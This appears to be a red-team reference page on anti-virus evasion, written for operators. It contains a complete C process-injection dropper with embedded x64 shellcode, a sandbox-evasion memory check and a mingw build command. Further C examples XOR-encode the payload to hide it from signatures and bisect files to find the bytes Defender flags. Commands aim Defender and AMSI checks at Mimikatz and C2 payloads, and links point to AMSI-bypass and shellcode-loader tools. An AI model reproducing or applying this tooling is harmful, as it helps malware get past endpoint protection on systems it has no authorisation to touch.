Why this topic matters
Anti-virus evasion basics matter because they decide how an operator stages a payload, which checks run before delivery (does the loader survive the AV emulator, do the bytes still trip a signature) and which evidence of a bypass is strong enough to keep. Weak handling of this topic leads to wasted time, noisy testing and softer findings.
This brief treats anti-virus evasion basics as a reusable field reference. The focus is on attack surface, decision points, practical workflow and the public material worth keeping nearby when you need to execute, verify or explain the subject under pressure.
Core coverage
The points below capture the main workflows, concepts, tools and operator decisions associated with anti-virus evasion basics.
- Phantom-Evasion
- Veil-Evasion
- Shellter
- AV bypass with unicorn.py
- Unicorn GitHub
- Bypass AV through custom source code
- AV evasion with the prometheus.cpp shell workflow
- AV evasion quick reference
- Prometheus.cpp
- Windows PowerShell macro code
Commands and snippets
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

int main(int argc, char* argv[]) {
    // x64 stub: walks the PEB to kernel32, resolves WinExec and runs "calc.exe"
    unsigned char payload[] =
    "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
    "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
    "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
    "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
    "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
    "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
    "\x48\x83\xec\x20\x41\xff\xd6";
    HANDLE ph;  // target process handle
    HANDLE rt;  // remote thread handle
    PVOID rb;   // buffer allocated inside the target
    DWORD pid;  // target process ID

    if (argc != 2) {
        printf("usage: %s <pid>\n", argv[0]);
        return 1;
    }
    pid = (DWORD)atoi(argv[1]);

    // allocate and fill 100 MB of memory: AV emulators with a capped heap hand back NULL,
    // so the injection below only runs on a host that can actually satisfy the request
    char *mem = (char *)malloc(100000000);
    if (mem == NULL) {
        return 0;   // treat as sandbox: exit without ever touching the payload
    }
    memset(mem, 0, 100000000);
    free(mem);

    ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (ph == NULL) {
        printf("OpenProcess failed: %lu\n", GetLastError());
        return 1;
    }
    printf("PID: %lu\n", pid);

    // allocate an RWX buffer in the remote process
    rb = VirtualAllocEx(ph, NULL, sizeof(payload), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (rb == NULL) {
        printf("VirtualAllocEx failed: %lu\n", GetLastError());
        CloseHandle(ph);
        return 1;
    }
    // copy the payload into the remote buffer
    if (!WriteProcessMemory(ph, rb, payload, sizeof(payload), NULL)) {
        printf("WriteProcessMemory failed: %lu\n", GetLastError());
        CloseHandle(ph);
        return 1;
    }
    // start a thread in the remote process at the start of the buffer
    rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)rb, NULL, 0, NULL);
    if (rt == NULL) {
        printf("CreateRemoteThread failed: %lu\n", GetLastError());
        CloseHandle(ph);
        return 1;
    }
    CloseHandle(rt);
    CloseHandle(ph);
    return 0;
}

build: x86_64-w64-mingw32-g++ dropper.cpp -o dropper.exe -mconsole -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
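The dropper above gates its injection on a 100 MB allocation but gives no way to exercise that check outside Windows. The following is an added example, not the page's code: it isolates the allocation probe into a function that can be tested on any host and, going beyond what the page shows, pairs it with the runtime XOR unwrapping a custom-source loader normally adds so the raw stub bytes never sit in the on-disk binary. The 16-byte sample payload (the first bytes of the stub above, used only as data), the key `constructed-key` and the function names are assumptions made for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Probe size matching the dropper above: 100 MB. */
#define PROBE_BYTES ((size_t)100 * 1000 * 1000)

/* Sandbox probe. Tries to obtain `bytes` of heap and fill it.
   Returns 1 when the host satisfies the request, 0 when malloc() returns NULL,
   which is how an emulator with a capped heap answers an oversized request.
   A loader that calls this first simply exits on 0 and never exposes its payload. */
int host_passes_allocation_probe(size_t bytes) {
    unsigned char *mem = (unsigned char *)malloc(bytes);
    if (mem == NULL) {
        return 0;
    }
    memset(mem, 0, bytes);
    /* Read one byte per page back through a volatile so the compiler cannot
       drop the malloc/memset/free triple as dead stores. */
    volatile unsigned char sink = 0;
    for (size_t i = 0; i < bytes; i += 4096) {
        sink ^= mem[i];
    }
    (void)sink;
    free(mem);
    return 1;
}

/* Repeating-key XOR in place. Applying it twice with the same key restores the
   input, so one routine encodes at build time and decodes at run time. */
void xor_in_place(unsigned char *buf, size_t len, const unsigned char *key, size_t keylen) {
    for (size_t i = 0; i < len; i++) {
        buf[i] ^= key[i % keylen];
    }
}

/* Number of positions where the encoded bytes still equal the plaintext bytes.
   Anything above zero means a 0x00 key byte left raw shellcode in the binary. */
size_t unchanged_bytes(const unsigned char *plain, const unsigned char *enc, size_t len) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        if (plain[i] == enc[i]) {
            n++;
        }
    }
    return n;
}

/* Constructed sample: the first 16 bytes of the stub shown above. They are only
   data here and are never executed. */
static const unsigned char SAMPLE_PAYLOAD[16] = {
    0x48, 0x31, 0xff, 0x48, 0xf7, 0xe7, 0x65, 0x48,
    0x8b, 0x58, 0x60, 0x48, 0x8b, 0x5b, 0x18, 0x48
};
/* Hypothetical key; any key without 0x00 bytes changes every payload byte. */
static const unsigned char KEY[] = "constructed-key";

/* Encode, verify no byte survived unchanged, decode, verify the round trip.
   Returns 1 on success, 0 on any failure. */
int demo_roundtrip(void) {
    unsigned char buf[sizeof SAMPLE_PAYLOAD];
    memcpy(buf, SAMPLE_PAYLOAD, sizeof buf);
    xor_in_place(buf, sizeof buf, KEY, sizeof KEY - 1);
    if (unchanged_bytes(SAMPLE_PAYLOAD, buf, sizeof buf) != 0) {
        return 0;
    }
    xor_in_place(buf, sizeof buf, KEY, sizeof KEY - 1);
    return memcmp(buf, SAMPLE_PAYLOAD, sizeof buf) == 0;
}

int main(void) {
    if (!host_passes_allocation_probe(PROBE_BYTES)) {
        puts("allocation probe failed: treating host as an emulator, exiting quietly");
        return 0;
    }
    printf("allocation probe passed; payload round trip %s\n",
           demo_roundtrip() ? "ok" : "FAILED");
    return 0;
}
```

On a real host the probe passes and the round trip succeeds; under an emulator that returns NULL for the 100 MB request the program exits before the payload bytes are ever decoded. Keep the XOR key free of 0x00 bytes, otherwise the corresponding stub bytes remain in clear and a byte signature can still match them.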
DefenderCheck.exe PowerUp.ps1                      # locate the bytes Defender flags in a script
AmsiTrigger_x64.exe -i Invoke-Mimikatz.ps1         # find the script segments that trigger AMSI
ThreatCheck.exe -f Downloads\Grunt.bin -e AMSI     # scan a raw payload with the AMSI engine instead of Defender
Related tooling:
- https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
- https://github.com/samratashok/nishang
- https://github.com/EmpireProject/Empire/blob/master/data/module_source/code_execution/Invoke-Shellcode.ps1
- https://powersploit.readthedocs.io/en/latest/
- https://github.com/danielbohannon/Invoke-Obfuscation
- https://amsi.fail
- https://github.com/TheWover/donut
- https://github.com/Flangvik/DLLSideloader
- https://github.com/Flangvik/NetLoader
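DefenderCheck and ThreatCheck, run above, locate the flagged bytes by repeatedly scanning shorter slices of the file rather than guessing. The following C program is an added example, not code from those projects or from the page: it implements that prefix bisection against a constructed scanner that flags the string `BADSIG`, standing in for the Defender engine or AmsiScanBuffer call the real tools make. The sample file, signature, offset and function names are all constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* A scanner callback returns non-zero when it flags the buffer it is given.
   DefenderCheck and ThreatCheck hand this role to the Defender engine or to
   AmsiScanBuffer; here a constructed byte matcher fills it so the search logic
   runs offline. */
typedef int (*scan_fn)(const unsigned char *buf, size_t len);

/* Constructed stand-in for an AV signature. */
static const unsigned char CONSTRUCTED_SIG[] = "BADSIG";
#define SIG_LEN (sizeof CONSTRUCTED_SIG - 1)

static int contains(const unsigned char *buf, size_t len,
                    const unsigned char *pat, size_t patlen) {
    if (patlen == 0 || len < patlen) {
        return 0;
    }
    for (size_t i = 0; i + patlen <= len; i++) {
        if (memcmp(buf + i, pat, patlen) == 0) {
            return 1;
        }
    }
    return 0;
}

/* Fake engine: flags any buffer containing the constructed signature. */
int fake_av_scan(const unsigned char *buf, size_t len) {
    return contains(buf, len, CONSTRUCTED_SIG, SIG_LEN);
}

/* Bisect over file prefixes to find the shortest prefix the scanner flags.
   Returns that prefix length (the flagged bytes end right before it) or -1 if
   the whole file is clean. Needs O(log n) scans instead of one per byte, which
   matters when every scan is a full engine invocation. */
long find_flag_offset(const unsigned char *buf, size_t len, scan_fn scan) {
    if (!scan(buf, len)) {
        return -1;
    }
    size_t lo = 0;   /* longest prefix known to be clean (the empty prefix is clean) */
    size_t hi = len; /* shortest prefix known to be flagged */
    while (hi - lo > 1) {
        size_t mid = lo + (hi - lo) / 2;
        if (scan(buf, mid)) {
            hi = mid;
        } else {
            lo = mid;
        }
    }
    return (long)hi;
}

/* Print the bytes just before the cut, the way the tools dump the offending region. */
void dump_context(const unsigned char *buf, size_t end, size_t window) {
    size_t start = end > window ? end - window : 0;
    printf("bytes %zu..%zu:", start, end);
    for (size_t i = start; i < end; i++) {
        printf(" %02x", buf[i]);
    }
    putchar('\n');
}

/* Constructed sample file: 4096 NOP bytes with the signature planted at offset 1000. */
#define SAMPLE_LEN 4096
#define SIG_OFFSET 1000
static void build_sample_file(unsigned char *file) {
    memset(file, 0x90, SAMPLE_LEN);
    memcpy(file + SIG_OFFSET, CONSTRUCTED_SIG, SIG_LEN);
}

/* Runs the search over the sample file; the result is SIG_OFFSET + SIG_LEN (1006). */
long demo_offset(void) {
    unsigned char file[SAMPLE_LEN];
    build_sample_file(file);
    return find_flag_offset(file, SAMPLE_LEN, fake_av_scan);
}

/* Same search over a file with no signature; the result is -1. */
long demo_clean(void) {
    unsigned char file[SAMPLE_LEN];
    memset(file, 0x90, SAMPLE_LEN);
    return find_flag_offset(file, SAMPLE_LEN, fake_av_scan);
}

int main(void) {
    unsigned char file[SAMPLE_LEN];
    build_sample_file(file);
    long off = find_flag_offset(file, SAMPLE_LEN, fake_av_scan);
    printf("shortest flagged prefix: %ld\n", off);
    if (off > 0) {
        dump_context(file, (size_t)off, 16);
    }
    return 0;
}
```

The search assumes detection is monotone in prefix length, which holds for a single byte signature. With several signatures, or heuristics that need the whole file, the tools are re-run after each patch until the file comes back clean, and so should you: one located offset is one signature, not proof of a bypass.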
